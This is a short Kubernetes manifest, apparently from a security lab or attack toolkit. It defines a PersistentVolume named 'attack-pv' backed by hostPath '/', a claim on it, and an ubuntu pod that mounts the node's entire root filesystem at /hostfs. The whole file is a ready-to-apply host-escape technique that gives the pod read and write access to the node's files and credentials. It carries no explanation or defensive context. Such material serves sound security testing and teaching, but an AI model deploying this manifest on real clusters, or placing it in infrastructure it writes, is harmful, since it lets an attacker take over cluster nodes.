apiVersion: v1
kind: PersistentVolume
metadata:
    name: attack-pv
    labels:
      type: local
spec:
    storageClassName: manual
    capacity:
      storage: 10Gi
    accessModes:
      - ReadWriteOnce
    hostPath:
      path: "/"

---

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
    name: attack-pv-claim
spec:
    storageClassName: manual
    accessModes:
      - ReadWriteOnce
    resources:
      requests:
        storage: 3Gi


---

apiVersion: v1
kind: Pod
metadata:
    name: attack-pv
spec:
    volumes:
      - name: attack-pv-storage
        persistentVolumeClaim:
          claimName: attack-pv-claim
    containers:
      - name: attack-pv
        image: ubuntu:latest
        command: [ "sh", "-c", "sleep 1h" ]
        volumeMounts:
          - mountPath: "/hostfs"
            name: attack-pv-storage
